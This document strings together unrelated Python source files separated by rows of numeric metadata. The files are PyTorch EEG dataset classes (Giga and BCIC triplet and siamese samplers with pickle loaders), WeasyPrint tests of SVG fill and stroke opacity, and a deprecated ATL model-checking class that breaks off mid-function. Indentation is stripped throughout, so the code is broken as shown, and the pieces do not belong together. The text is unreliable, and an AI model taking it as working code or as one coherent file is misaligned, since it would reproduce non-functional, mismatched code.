img1 = self.x_data[index,:,:,100:500]
y1 = self.y_data[index]
positive_index = index
while positive_index == index:
positive_index = np.random.choice(self.label_to_indices[np.random.choice(
self.labels_set[np.where(
(self.labels_set % 2 == y1 % 2) & (
(self.labels_set - self.labels_set % 2) / 2 !=
(y1-y1%2)/2), True, False)]
)])
negative_label = np.random.choice(self.labels_set[np.where((self.labels_set%2!=y1%2) & ((self.labels_set-self.labels_set%2)/2 != (y1-y1%2)/2), True,False)])
# negative_label = np.random.choice(self.labels_set[np.where((self.labels_set%2!=y1%2) & ((self.labels_set-self.labels_set%2)/2 != (y1-y1%2)/2), True,False)]) #diffsub
negative_index = np.random.choice(self.label_to_indices[negative_label])
img2 = self.x_data[positive_index,:,:,100:500]
img3 = self.x_data[negative_index,:,:,100:500]
y2 = self.y_data[positive_index]
y3 = self.y_data[negative_index]
else:
img1 = self.x_data[self.test_triplets[index][0],:,:,100:500]
img2 = self.x_data[self.test_triplets[index][1],:,:,100:500]
img3 = self.x_data[self.test_triplets[index][2],:,:,100:500]
y1 = self.y_data[self.test_triplets[index][0]]
y2 = self.y_data[self.test_triplets[index][1]]
y3 = self.y_data[self.test_triplets[index][2]]
img1 = torch.from_numpy(img1).type(torch.FloatTensor)
img2 = torch.from_numpy(img2).type(torch.FloatTensor)
img3 = torch.from_numpy(img3).type(torch.FloatTensor)
if self.transform is not None:
img1 = self.transform(img1)
img2 = self.transform(img2)
img3 = self.transform(img3)
return (img1, img2, img3), (y1%2,y2%2,y3%2)
def __len__(self):
return self.len
class TripletGigaOrigin(Dataset):
def __init__(self,x,y, valtype, transform=None,istrain = True, sess=1,subj=None, trial=None):
self.transform = transform
self.istrain = istrain
if trial is None:
if istrain:
self.trial = 0,200
else:
self.trial = 100,200 #online
else:
self.trial = trial
x_data = x.copy()
y_data = y.copy()
self.in_chans = x_data.shape[2]
self.input_time_length = x_data.shape[3]
x_data = x_data.reshape(108, -1, 1, self.in_chans, self.input_time_length)
y_data = y_data.reshape(108,-1)
if valtype == 'sess':
if istrain:
x_data = x_data[np.s_[0:54], self.trial[0]:self.trial[1], :, :, :]
y_data = y_data[np.s_[0:54], self.trial[0]:self.trial[1]]
else:
x_data = x_data[np.s_[0 + 54:54 + 54], self.trial[0]:self.trial[1], :, :, :] # tests sess2 online
y_data = y_data[np.s_[0 + 54:54 + 54], self.trial[0]:self.trial[1]]
elif valtype == 'loso':
if subj is None:
raise AssertionError()
if istrain:
x_data = np.delete(x_data, np.s_[subj, subj + 54], 0) # leave one subj
y_data = np.delete(y_data, np.s_[subj, subj + 54], 0)
else:
x_data = x_data[np.s_[subj + 54], self.trial[0]:self.trial[1], :, :, :] # tests sess2 online
y_data = y_data[np.s_[subj + 54], self.trial[0]:self.trial[1]]
elif valtype == 'subj':
if subj is None:
raise AssertionError()
if istrain:
x_data = x_data[subj, self.trial[0]:self.trial[1], :, :, :]
y_data = y_data[subj, self.trial[0]:self.trial[1]]
else:
x_data = x_data[subj, self.trial[0]:self.trial[1], :, :, :] # tests sess2 online
y_data = y_data[subj, self.trial[0]:self.trial[1]]
else:
raise AssertionError()
self.x_data = x_data.reshape(-1, 1, self.in_chans, self.input_time_length)
self.y_data = y_data.reshape(-1)
self.y_subj = (y_data.reshape(-1)-self.y_data%2)/2
self.len = self.y_data.shape[0]
self.labels_set = np.unique(self.y_data)
self.label_to_indices = {label: np.where(self.y_data == label)[0]
for label in self.labels_set}
random_state = np.random.RandomState(0)
if not istrain:
self.labels_set = np.unique(self.y_data)
self.label_to_indices = {label: np.where(self.y_data == label)[0]
for label in self.labels_set}
triplets = [[i,
random_state.choice(self.label_to_indices[ # samp task, diff subj
np.random.choice(
self.labels_set[np.where(
(self.labels_set % 2 == self.y_data[i] % 2), True, False)]
)
]),
random_state.choice(self.label_to_indices[#diff task, same subj
np.random.choice(
self.labels_set[np.where((self.labels_set%2!=self.y_data[i]%2), True,False)]
)
])
]
for i in range(self.len)]
self.test_triplets = triplets
def __getitem__(self, index):
np.random.seed(0)
if self.istrain:
img1 = self.x_data[index,:,:,100:500]
y1 = self.y_data[index]
positive_index = index
while positive_index == index:
positive_index = np.random.choice(self.label_to_indices[np.random.choice(
self.labels_set[np.where(
(self.labels_set % 2 == y1 % 2), True, False)]
)])
negative_label = np.random.choice(self.labels_set[np.where((self.labels_set%2!=y1%2) , True,False)])
# negative_label = np.random.choice(self.labels_set[np.where((self.labels_set%2!=y1%2) & ((self.labels_set-self.labels_set%2)/2 != (y1-y1%2)/2), True,False)]) #diffsub
negative_index = np.random.choice(self.label_to_indices[negative_label])
img2 = self.x_data[positive_index,:,:,100:500]
img3 = self.x_data[negative_index,:,:,100:500]
y2 = self.y_data[positive_index]
y3 = self.y_data[negative_index]
else:
img1 = self.x_data[self.test_triplets[index][0],:,:,100:500]
img2 = self.x_data[self.test_triplets[index][1],:,:,100:500]
img3 = self.x_data[self.test_triplets[index][2],:,:,100:500]
y1 = self.y_data[self.test_triplets[index][0]]
y2 = self.y_data[self.test_triplets[index][1]]
y3 = self.y_data[self.test_triplets[index][2]]
img1 = torch.from_numpy(img1).type(torch.FloatTensor)
img2 = torch.from_numpy(img2).type(torch.FloatTensor)
img3 = torch.from_numpy(img3).type(torch.FloatTensor)
if self.transform is not None:
img1 = self.transform(img1)
img2 = self.transform(img2)
img3 = self.transform(img3)
return (img1, img2, img3), (y1%2,y2%2,y3%2)
def __len__(self):
return self.len
class SiamesGiga(Dataset):
def __init__(self,x,y, valtype, transform=None,istrain = True, sess=1,subj=None, trial=None):
self.transform = transform
self.istrain = istrain
if trial is None:
if istrain:
self.trial = 0,200
else:
self.trial = 100,200 #online
else:
self.trial = trial
x_data = x.copy()
y_data = y.copy()
self.in_chans = x_data.shape[2]
self.input_time_length = x_data.shape[3]
x_data = x_data.reshape(108, -1, 1, self.in_chans, self.input_time_length)
y_data = y_data.reshape(108,-1)
if valtype == 'sess':
if istrain:
x_data = x_data[np.s_[0:54], self.trial[0]:self.trial[1], :, :, :]
y_data = y_data[np.s_[0:54], self.trial[0]:self.trial[1]]
else:
x_data = x_data[np.s_[0 + 54:54 + 54], self.trial[0]:self.trial[1], :, :, :] # tests sess2 online
y_data = y_data[np.s_[0 + 54:54 + 54], self.trial[0]:self.trial[1]]
elif valtype == 'loso':
if subj is None:
raise AssertionError()
if istrain:
x_data = np.delete(x_data, np.s_[subj, subj + 54], 0) # leave one subj
y_data = np.delete(y_data, np.s_[subj, subj + 54], 0)
else:
x_data = x_data[np.s_[subj + 54], self.trial[0]:self.trial[1], :, :, :] # tests sess2 online
y_data = y_data[np.s_[subj + 54], self.trial[0]:self.trial[1]]
elif valtype == 'subj':
if subj is None:
raise AssertionError()
if istrain:
x_data = x_data[subj, self.trial[0]:self.trial[1], :, :, :]
y_data = y_data[subj, self.trial[0]:self.trial[1]]
else:
x_data = x_data[subj, self.trial[0]:self.trial[1], :, :, :] # tests sess2 online
y_data = y_data[subj, self.trial[0]:self.trial[1]]
else:
raise AssertionError()
self.x_data = x_data.reshape(-1, 1, self.in_chans, self.input_time_length)
self.y_data = y_data.reshape(-1)
self.y_subj = (y_data.reshape(-1)-self.y_data%2)/2
self.len = self.y_data.shape[0]
self.labels_set = np.unique(self.y_data)
self.label_to_indices = {label: np.where(self.y_data == label)[0]
for label in self.labels_set}
random_state = np.random.RandomState(0)
if not istrain:
self.labels_set = np.unique(self.y_data)
self.label_to_indices = {label: np.where(self.y_data == label)[0]
for label in self.labels_set}
triplets = [[i,
random_state.choice(self.label_to_indices[ # samp task, diff subj
np.random.choice(
self.labels_set[np.where(
(self.labels_set % 2 == self.y_data[i] % 2), True, False)]
)
]),
random_state.choice(self.label_to_indices[#diff task, same subj
np.random.choice(
self.labels_set[np.where((self.labels_set%2!=self.y_data[i]%2), True,False)]
)
])
]
for i in range(self.len)]
self.test_triplets = triplets
def __getitem__(self, index):
np.random.seed(0)
if self.istrain:
img1 = self.x_data[index,:,:,100:500]
y1 = self.y_data[index]
positive_index = index
while positive_index == index:
positive_index = np.random.choice(self.label_to_indices[np.random.choice(
self.labels_set[np.where(
(self.labels_set % 2 == y1 % 2), True, False)]
)])
negative_label = np.random.choice(self.labels_set[np.where((self.labels_set%2!=y1%2) , True,False)])
# negative_label = np.random.choice(self.labels_set[np.where((self.labels_set%2!=y1%2) & ((self.labels_set-self.labels_set%2)/2 != (y1-y1%2)/2), True,False)]) #diffsub
negative_index = np.random.choice(self.label_to_indices[negative_label])
img2 = self.x_data[positive_index,:,:,100:500]
img3 = self.x_data[negative_index,:,:,100:500]
y2 = self.y_data[positive_index]
y3 = self.y_data[negative_index]
else:
img1 = self.x_data[self.test_triplets[index][0],:,:,100:500]
img2 = self.x_data[self.test_triplets[index][1],:,:,100:500]
img3 = self.x_data[self.test_triplets[index][2],:,:,100:500]
y1 = self.y_data[self.test_triplets[index][0]]
y2 = self.y_data[self.test_triplets[index][1]]
y3 = self.y_data[self.test_triplets[index][2]]
img1 = torch.from_numpy(img1).type(torch.FloatTensor)
img2 = torch.from_numpy(img2).type(torch.FloatTensor)
img3 = torch.from_numpy(img3).type(torch.FloatTensor)
if self.transform is not None:
img1 = self.transform(img1)
img2 = self.transform(img2)
img3 = self.transform(img3)
return (img1, img2, img3), (y1%2,y2%2,y3%2)
def __len__(self):
return self.len
class GigaDataset(Dataset):
def __init__(self,x,y, valtype, transform=None,istrain = True, sess=1,subj=None, trial=None):
#trial : (tuple) trial = min, max
self.transform = transform
if trial is None:
if istrain:
self.trial = 0,200
else:
self.trial = 100,200 #online
else:
self.trial = trial
x_data = x.copy()
y_data = y.copy()
self.in_chans = x_data.shape[2]
self.input_time_length = x_data.shape[3]
x_data = x_data.reshape(108,-1,1,self.in_chans,self.input_time_length)
y_data = y_data.reshape(108,-1)
if valtype =='sess':
if istrain:
x_data = x_data[np.s_[0:54],self.trial[0]:self.trial[1],:,:,:]
y_data = y_data[np.s_[0:54],self.trial[0]:self.trial[1]]
else:
x_data = x_data[np.s_[0+54:54+54],self.trial[0]:self.trial[1],:,:,:] #tests sess2 online
y_data = y_data[np.s_[0+54:54+54],self.trial[0]:self.trial[1]]
elif valtype == 'loso':
if subj is None:
raise AssertionError()
if istrain:
x_data = np.delete(x_data,np.s_[subj,subj+54],0) #leave one subj
y_data = np.delete(y_data,np.s_[subj,subj+54],0)
else:
x_data = x_data[np.s_[subj+54], self.trial[0]:self.trial[1], :, :, :] # tests sess2 online
y_data = y_data[np.s_[subj+54], self.trial[0]:self.trial[1]]
elif valtype == 'subj':
if subj is None:
raise AssertionError()
if istrain:
x_data = x_data[subj, self.trial[0]:self.trial[1], :, :, :]
y_data = y_data[subj, self.trial[0]:self.trial[1]]
else:
x_data = x_data[subj, self.trial[0]:self.trial[1], :, :, :] # tests sess2 online
y_data = y_data[subj, self.trial[0]:self.trial[1]]
else:
raise AssertionError()
x_data = x_data.reshape(-1, 1, self.in_chans,self.input_time_length)
y_data = y_data.reshape(-1)
self.len = y_data.shape[0]
x_data = torch.from_numpy(x_data)
y_data = torch.from_numpy(y_data)
self.x_data = x_data.type(torch.FloatTensor)
self.y_data = y_data.long()
def __getitem__(self, index):
x = self.x_data[index,:,:,:]
y = self.y_data[index]
# fs =100
# N = 400
# import librosa
# import librosa.display
#
# xtemp = x.clone().view(-1)
# f, t, Zxx = signal.spectrogram(xtemp,fs=fs,mode='psd')
#
# D = np.abs(librosa.stft(xtemp.numpy(),n_fft=30,center=False))
#
# librosa.display.specshow(librosa.amplitude_to_db(D,ref=np.max),y_axis='log', x_axis='time')
# f, t, Zxx = signal.spectrogram(x[0,:,:],fs=fs,nperseg=60,noverlap=49,mode='psd')
#
# plt.pcolormesh(t, f,Zxx)
# plt.title('STFT Magnitude')
# plt.ylabel('Frequency [Hz]')
# plt.xlabel('Time [sec]')
# plt.show()
# x = torch.from_numpy(Zxx)
# Normalize your data here
if self.transform:
x = self.transform(x)
return x, y
def __len__(self):
return self.len
class BCICDataset(Dataset):
def __init__(self,x,y, valtype, transform=None,istrain = True, sess=1,subj=None, trial=None):
#trial : (tuple) trial = min, max
self.transform = transform
if trial is None:
if istrain:
self.trial = 0,200
else:
self.trial = 100,200 #online
else:
self.trial = trial
x_data = x.copy()
y_data = y.copy()
self.in_chans = x_data.shape[2]
self.input_time_length = x_data.shape[3]
x_data = x_data.reshape(9,-1,1,self.in_chans,self.input_time_length)
y_data = y_data.reshape(9,-1)
if valtype =='sess':
if istrain:
x_data = x_data[np.s_[0:54],self.trial[0]:self.trial[1],:,:,:]
y_data = y_data[np.s_[0:54],self.trial[0]:self.trial[1]]
else:
x_data = x_data[np.s_[0+54:54+54],self.trial[0]:self.trial[1],:,:,:] #tests sess2 online
y_data = y_data[np.s_[0+54:54+54],self.trial[0]:self.trial[1]]
elif valtype == 'loso':
if subj is None:
raise AssertionError()
if istrain:
x_data = np.delete(x_data,np.s_[subj,subj+54],0) #leave one subj
y_data = np.delete(y_data,np.s_[subj,subj+54],0)
else:
x_data = x_data[np.s_[subj+54], self.trial[0]:self.trial[1], :, :, :] # tests sess2 online
y_data = y_data[np.s_[subj+54], self.trial[0]:self.trial[1]]
elif valtype == 'subj':
if subj is None:
raise AssertionError()
if istrain:
x_data = x_data[subj, self.trial[0]:self.trial[1], :, :, :]
y_data = y_data[subj, self.trial[0]:self.trial[1]]
else:
x_data = x_data[subj, self.trial[0]:self.trial[1], :, :, :] # tests sess2 online
y_data = y_data[subj, self.trial[0]:self.trial[1]]
else:
raise AssertionError()
x_data = x_data.reshape(-1, 1, self.in_chans,self.input_time_length)
y_data = y_data.reshape(-1)
self.len = y_data.shape[0]
x_data = torch.from_numpy(x_data)
y_data = torch.from_numpy(y_data)
self.x_data = x_data.type(torch.FloatTensor)
self.y_data = y_data.long()
def __getitem__(self, index):
x = self.x_data[index,:,:,:]
y = self.y_data[index]
# fs =100
# N = 400
# import librosa
# import librosa.display
#
# xtemp = x.clone().view(-1)
# f, t, Zxx = signal.spectrogram(xtemp,fs=fs,mode='psd')
#
# D = np.abs(librosa.stft(xtemp.numpy(),n_fft=30,center=False))
#
# librosa.display.specshow(librosa.amplitude_to_db(D,ref=np.max),y_axis='log', x_axis='time')
# f, t, Zxx = signal.spectrogram(x[0,:,:],fs=fs,nperseg=60,noverlap=49,mode='psd')
#
# plt.pcolormesh(t, f,Zxx)
# plt.title('STFT Magnitude')
# plt.ylabel('Frequency [Hz]')
# plt.xlabel('Time [sec]')
# plt.show()
# x = torch.from_numpy(Zxx)
# Normalize your data here
if self.transform:
x = self.transform(x)
return x, y
def __len__(self):
return self.len
def load_smt(path='C:/Users/dk/PycharmProjects/data/giga', fs=100):
with open(path+'/epoch_labels.pkl', 'rb') as f:
y_data = pickle.load(f)
# #기존 6폴드 성능은 이걸로 낸거였음
# with open(path+'/smt250_1_new_norm.pkl', 'rb') as f:
# x_data1 = pickle.load(f)
# with open(path+'/smt250_2_new_norm.pkl', 'rb') as f:
# x_data2 = pickle.load(f)
#
#
# #
# #
# with open(path+'/smt1_new_norm.pkl', 'rb') as f:
# x_data1 = pickle.load(f)
# with open(path+'/smt2_new_norm.pkl', 'rb') as f:
# x_data2 = pickle.load(f)
#
# x_data = np.concatenate([x_data1, x_data2])
if fs==100:
with open(path + '/smt100_fix.pkl', 'rb') as f:
x_data = pickle.load(f)
x_data = np.expand_dims(x_data, axis=1)
x_data = x_data[:, :, :, 100:]
elif fs==250:
with open(path + '/smt250_fix.pkl', 'rb') as f:
x_data = pickle.load(f)
x_data = np.expand_dims(x_data, axis=1)
x_data = x_data[:, :, :, 250:]
return x_data,y_data
def load_bcic(path='C:/Users/dk/PycharmProjects/test_braindecode/braindecode-master_new/examples', fs=100):
with open(path+'/bcic4class_labels.pkl', 'rb') as f:
y_data = pickle.load(f)
with open(path + '/bcic4class.pkl', 'rb') as f:
x_data = pickle.load(f)
x_data = np.expand_dims(x_data, axis=1)
x_data = x_data[:, :, :, 125:]
from sklearn.preprocessing import Normalizer
transformer = Normalizer()
raw_data_train = np.zeros_like(x_data)
for i in range(x_data.shape[0]):
raw_fit = transformer.transform(x_data[i,0, :, :])
# raw_fit = sc.fit_transform(x_data[i, :, :])
# raw_fit = maxabs_scale(x_data[i, :, :])
raw_data_train[i,0, :, :] = raw_fit[:, :]
print(i)
return x_data,y_data
| 41.00262
| 189
| 0.518084
| 6,154
| 46,948
| 3.751381
| 0.039974
| 0.055661
| 0.060816
| 0.048514
| 0.937971
| 0.925063
| 0.916876
| 0.907866
| 0.905181
| 0.905181
| 0
| 0.043213
| 0.350835
| 46,948
| 1,145
| 190
| 41.00262
| 0.714276
| 0.073464
| 0
| 0.881733
| 0
| 0
| 0.00717
| 0.003112
| 0
| 0
| 0
| 0
| 0.032787
| 1
| 0.037471
| false
| 0
| 0.015222
| 0.010539
| 0.088993
| 0.002342
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5c91f2a0eba101a3a0f4edd1881e02d05bc5585b
| 5,175
|
py
|
Python
|
tests/draw/svg/test_opacity.py
|
rianmcguire/WeasyPrint
|
7e400663236d16121e14cf3183ce53828d056092
|
[
"BSD-3-Clause"
] | 4,512
|
2015-01-02T16:40:59.000Z
|
2022-03-31T17:26:28.000Z
|
tests/draw/svg/test_opacity.py
|
rianmcguire/WeasyPrint
|
7e400663236d16121e14cf3183ce53828d056092
|
[
"BSD-3-Clause"
] | 1,420
|
2015-01-07T21:17:01.000Z
|
2022-03-31T10:23:45.000Z
|
tests/draw/svg/test_opacity.py
|
rianmcguire/WeasyPrint
|
7e400663236d16121e14cf3183ce53828d056092
|
[
"BSD-3-Clause"
] | 640
|
2015-01-30T18:07:09.000Z
|
2022-03-24T20:17:42.000Z
|
"""
weasyprint.tests.test_draw.svg.test_opacity
-------------------------------------------
Test how opacity is handled for SVG.
"""
import pytest
from ...testing_utils import assert_no_logs
from .. import assert_same_rendering
# TODO: xfail tests fail because of GhostScript and are supposed to work with
# real PDF files.
opacity_source = '''
<style>
@page { size: 9px }
svg { display: block }
</style>
<svg width="9px" height="9px" xmlns="http://www.w3.org/2000/svg">%s</svg>'''
@assert_no_logs
def test_opacity():
assert_same_rendering(9, 9, (
('opacity_reference', opacity_source % '''
<rect x="2" y="2" width="5" height="5" stroke-width="2"
stroke="rgb(127, 255, 127)" fill="rgb(127, 127, 255)" />
'''),
('opacity', opacity_source % '''
<rect x="2" y="2" width="5" height="5" stroke-width="2"
stroke="lime" fill="blue" opacity="0.5" />
'''),
))
@assert_no_logs
def test_fill_opacity():
assert_same_rendering(9, 9, (
('fill_opacity_reference', opacity_source % '''
<rect x="2" y="2" width="5" height="5"
fill="blue" opacity="0.5" />
<rect x="2" y="2" width="5" height="5" stroke-width="2"
stroke="lime" fill="transparent" />
'''),
('fill_opacity', opacity_source % '''
<rect x="2" y="2" width="5" height="5" stroke-width="2"
stroke="lime" fill="blue" fill-opacity="0.5" />
'''),
))
@pytest.mark.xfail
@assert_no_logs
def test_stroke_opacity():
assert_same_rendering(9, 9, (
('stroke_opacity_reference', opacity_source % '''
<rect x="2" y="2" width="5" height="5"
fill="blue" />
<rect x="2" y="2" width="5" height="5" stroke-width="2"
stroke="lime" fill="transparent" opacity="0.5" />
'''),
('stroke_opacity', opacity_source % '''
<rect x="2" y="2" width="5" height="5" stroke-width="2"
stroke="lime" fill="blue" stroke-opacity="0.5" />
'''),
))
@pytest.mark.xfail
@assert_no_logs
def test_stroke_fill_opacity():
assert_same_rendering(9, 9, (
('stroke_fill_opacity_reference', opacity_source % '''
<rect x="2" y="2" width="5" height="5"
fill="blue" opacity="0.5" />
<rect x="2" y="2" width="5" height="5" stroke-width="2"
stroke="lime" fill="transparent" opacity="0.5" />
'''),
('stroke_fill_opacity', opacity_source % '''
<rect x="2" y="2" width="5" height="5" stroke-width="2"
stroke="lime" fill="blue"
stroke-opacity="0.5" fill-opacity="0.5" />
'''),
))
@pytest.mark.xfail
@assert_no_logs
def test_pattern_gradient_stroke_fill_opacity():
assert_same_rendering(9, 9, (
('pattern_gradient_stroke_fill_opacity_reference', opacity_source % '''
<defs>
<linearGradient id="grad" x1="0" y1="0" x2="0" y2="1"
gradientUnits="objectBoundingBox">
<stop stop-color="black" offset="42.86%"></stop>
<stop stop-color="green" offset="42.86%"></stop>
</linearGradient>
<pattern id="pat" x="0" y="0" width="2" height="2"
patternUnits="userSpaceOnUse"
patternContentUnits="userSpaceOnUse">
<rect x="0" y="0" width="1" height="1" fill="blue" />
<rect x="0" y="1" width="1" height="1" fill="red" />
<rect x="1" y="0" width="1" height="1" fill="red" />
<rect x="1" y="1" width="1" height="1" fill="blue" />
</pattern>
</defs>
<rect x="2" y="2" width="5" height="5"
fill="url(#pat)" opacity="0.5" />
<rect x="2" y="2" width="5" height="5" stroke-width="2"
stroke="url(#grad)" fill="transparent" opacity="0.5" />
'''),
('pattern_gradient_stroke_fill_opacity', opacity_source % '''
<defs>
<linearGradient id="grad" x1="0" y1="0" x2="0" y2="1"
gradientUnits="objectBoundingBox">
<stop stop-color="black" offset="42.86%"></stop>
<stop stop-color="green" offset="42.86%"></stop>
</linearGradient>
<pattern id="pat" x="0" y="0" width="2" height="2"
patternUnits="userSpaceOnUse"
patternContentUnits="userSpaceOnUse">
<rect x="0" y="0" width="1" height="1" fill="blue" />
<rect x="0" y="1" width="1" height="1" fill="red" />
<rect x="1" y="0" width="1" height="1" fill="red" />
<rect x="1" y="1" width="1" height="1" fill="blue" />
</pattern>
</defs>
<rect x="2" y="2" width="5" height="5" stroke-width="2"
stroke="url(#grad)" fill="url(#pat)"
stroke-opacity="0.5" fill-opacity="0.5" />
'''),
))
| 38.051471
| 79
| 0.499517
| 634
| 5,175
| 3.963722
| 0.149842
| 0.043772
| 0.033426
| 0.038997
| 0.859928
| 0.808595
| 0.787107
| 0.758456
| 0.719459
| 0.719459
| 0
| 0.055772
| 0.307053
| 5,175
| 135
| 80
| 38.333333
| 0.645008
| 0.042126
| 0
| 0.696429
| 0
| 0.214286
| 0.79311
| 0.090983
| 0
| 0
| 0
| 0.007407
| 0.107143
| 1
| 0.044643
| false
| 0
| 0.026786
| 0
| 0.071429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5c95e0acaa9d51105dbde2a4e81110d7cc429dc2
| 31,467
|
py
|
Python
|
old/atl_model.py
|
blackbat13/stv
|
fc73fd50ad1ab6a36a6b4d6b1aec02c4bcd1b094
|
[
"MIT"
] | 2
|
2021-07-11T09:52:59.000Z
|
2022-02-13T17:34:59.000Z
|
old/atl_model.py
|
blackbat13/stv
|
fc73fd50ad1ab6a36a6b4d6b1aec02c4bcd1b094
|
[
"MIT"
] | 3
|
2020-07-26T13:49:59.000Z
|
2021-01-19T18:04:10.000Z
|
old/atl_model.py
|
blackbat13/stv
|
fc73fd50ad1ab6a36a6b4d6b1aec02c4bcd1b094
|
[
"MIT"
] | null | null | null |
# DEPRECATED
import itertools
import copy
from tools.disjoint_set import *
__author__ = 'blackbat'
def create_array_of_size(size, basic_item):
array = []
for i in range(0, size):
array.append(basic_item.copy())
return array[:]
def unique(l):
s = set()
n = 0
for x in l:
if x not in s:
s.add(x)
l[n] = x
n += 1
del l[n:]
def and_operator(a, b):
c = []
for item in a:
if item in b:
c.append(item)
return c
class ATLModel:
number_of_agents = 0
number_of_states = 0
transitions = []
reverse_transitions = []
pre_states = []
imperfect_information = []
agents_actions = []
states = []
epistemic_class_membership = []
epistemic_class_disjoint = None
can_go_there = []
def __init__(self, number_of_agents, number_of_states):
self.number_of_agents = number_of_agents
self.number_of_states = number_of_states
self.init_transitions()
self.init_states()
self.init_actions()
self.init_epistemic_relation()
self.can_go_there = [[] for _ in itertools.repeat(None, number_of_agents)]
def init_transitions(self):
self.transitions = [[] for _ in itertools.repeat(None, self.number_of_states)]
self.reverse_transitions = [[] for _ in itertools.repeat(None, self.number_of_states)]
def init_states(self):
self.pre_states = [set() for _ in itertools.repeat(None, self.number_of_states)]
def init_actions(self):
self.agents_actions = [[] for _ in itertools.repeat(None, self.number_of_agents)]
def init_epistemic_relation(self):
self.epistemic_class_membership = create_array_of_size(self.number_of_agents, [])
self.epistemic_class_disjoint = [DisjointSet(self.number_of_states) for _ in
itertools.repeat(None, self.number_of_agents)]
self.imperfect_information = create_array_of_size(self.number_of_agents, [])
for i in range(0, self.number_of_agents):
self.imperfect_information[i] = []
self.epistemic_class_membership[i] = [-1 for _ in itertools.repeat(None, self.number_of_states)]
def add_action(self, agent, action):
self.agents_actions[agent].append(action)
def enlarge_transitions(self, size):
if len(self.transitions) <= size:
to_add = size - len(self.transitions) + 1
for i in range(0, to_add):
self.transitions.append([])
self.reverse_transitions.append([])
self.pre_states.append(set())
def max(self, a, b):
if a > b:
return a
else:
return b
def add_transition(self, from_state, to_state, actions):
self.enlarge_transitions(self.max(from_state, to_state))
if {'nextState': to_state, 'actions': actions} not in self.transitions[from_state]:
self.transitions[from_state].append({'nextState': to_state, 'actions': actions.copy()})
self.reverse_transitions[to_state].append({'nextState': from_state, 'actions': actions.copy()})
self.pre_states[to_state].add(from_state)
def add_epistemic_class(self, agent_number, epistemic_class):
self.imperfect_information[agent_number].append(set(epistemic_class))
epistemic_class_number = len(self.imperfect_information[agent_number]) - 1
first_state = next(iter(epistemic_class))
for state in epistemic_class:
self.epistemic_class_membership[agent_number][state] = epistemic_class_number
self.epistemic_class_disjoint[agent_number].union(first_state, state)
self.find_where_can_go(epistemic_class, epistemic_class_number, agent_number)
def find_where_can_go(self, epistemic_class, epistemic_class_number, agent_number):
if len(self.can_go_there[agent_number]) == 0:
self.can_go_there[agent_number] = [{} for _ in itertools.repeat(None, self.number_of_states)]
for action in self.agents_actions[agent_number]:
can_go_temp = set()
is_first = True
for state in epistemic_class:
can_go_state_temp = set()
for transition in self.transitions[state]:
if transition['actions'][agent_number] == action:
can_go_state_temp.add(transition['nextState'])
if is_first:
is_first = False
can_go_temp = set(can_go_state_temp)
else:
can_go_temp |= can_go_state_temp
if len(can_go_state_temp) == 0:
can_go_temp = set()
break
self.can_go_there[agent_number][epistemic_class_number][action] = can_go_temp
def basic_formula(self, agent_number, winning_state):
result_states = []
for state in self.pre_states[winning_state]:
ok = True
for same_state in self.imperfect_information[agent_number][state]:
if not self.is_reachable_by_agent(same_state, winning_state, agent_number):
ok = False
break
if ok:
result_states.append(state)
return result_states
def is_reachable_by_agents_in_set(self, action, from_state, winning_states, agents):
action_ok = False
for transition in self.transitions[from_state]:
if self.is_possible_transition(agents, action, transition):
action_ok = True
if not (transition['nextState'] in winning_states):
return False
return action_ok
def is_reachable_by_agent_disjoint(self, action, from_state, agent, first_winning, winning_states_disjoint):
action_ok = False
for transition in self.transitions[from_state]:
if transition['actions'][agent] == action:
action_ok = True
if not winning_states_disjoint.is_in_union(first_winning, transition['nextState']):
return False
return action_ok
def is_reachable_by_agent(self, action, from_state, is_winning_state, agent):
action_ok = False
for transition in self.transitions[from_state]:
if transition['actions'][agent] == action:
action_ok = True
if not is_winning_state[transition['nextState']]:
return False
return action_ok
def is_reachable_by_agent_in_set(self, action, from_state, winning_states, agent):
action_ok = False
for transition in self.transitions[from_state]:
if transition['actions'][agent] == action:
action_ok = True
if not (transition['nextState'] in winning_states):
return False
return action_ok
def get_agents_actions(self, agents):
actions = []
for agent in agents:
actions.append(self.agents_actions[agent])
return actions
def basic_formula_one_agent_multiple_states_disjoint(self, agent, current_states, first_winning,
winning_states_disjoint,
custom_can_go_there):
result_states = []
actions = self.agents_actions[agent]
preimage = set()
modified = False
for winning_state in current_states:
for pre_state in self.pre_states[winning_state]:
preimage.add(self.epistemic_class_membership[agent][pre_state])
first_winning = winning_states_disjoint.find(first_winning)
for state_epistemic_class in preimage:
state = next(iter(self.imperfect_information[agent][state_epistemic_class]))
state = winning_states_disjoint.find(state)
if state == first_winning:
continue
if state_epistemic_class == -1:
print("ERROR")
same_states = [state]
else:
same_states = self.imperfect_information[agent][state_epistemic_class]
for action in actions:
states_can_go = custom_can_go_there[state_epistemic_class][action]
if len(states_can_go) == 0:
continue
is_ok = True
new_states_can_go = set()
for state_can in states_can_go:
new_state_can = winning_states_disjoint.find(state_can)
if first_winning != new_state_can:
is_ok = False
new_states_can_go.add(new_state_can)
custom_can_go_there[state_epistemic_class][action] = new_states_can_go
if is_ok:
result_states.extend(same_states)
winning_states_disjoint.union(first_winning, state)
first_winning = winning_states_disjoint.find(first_winning)
modified = True
break
return {'result': result_states, 'modified': modified}
def basic_formula_one_agent_multiple_states_disjoint_mcmas_approach(self, agent, current_states, first_winning,
winning_states_disjoint,
custom_can_go_there):
result_states = []
actions = self.agents_actions[agent]
preimage = set()
modified = False
for winning_state in current_states:
for pre_state in self.pre_states[winning_state]:
preimage.add(self.epistemic_class_membership[agent][pre_state])
first_winning = winning_states_disjoint.find(first_winning)
for state_epistemic_class in preimage:
state = next(iter(self.imperfect_information[agent][state_epistemic_class]))
state = winning_states_disjoint.find(state)
if state == first_winning:
continue
if state_epistemic_class == -1:
print("ERROR")
same_states = [state]
else:
same_states = self.imperfect_information[agent][state_epistemic_class]
all_actions = set()
bad_actions = set()
for same_state in same_states:
for transition in self.transitions[same_state]:
all_actions.add(transition['actions'][agent])
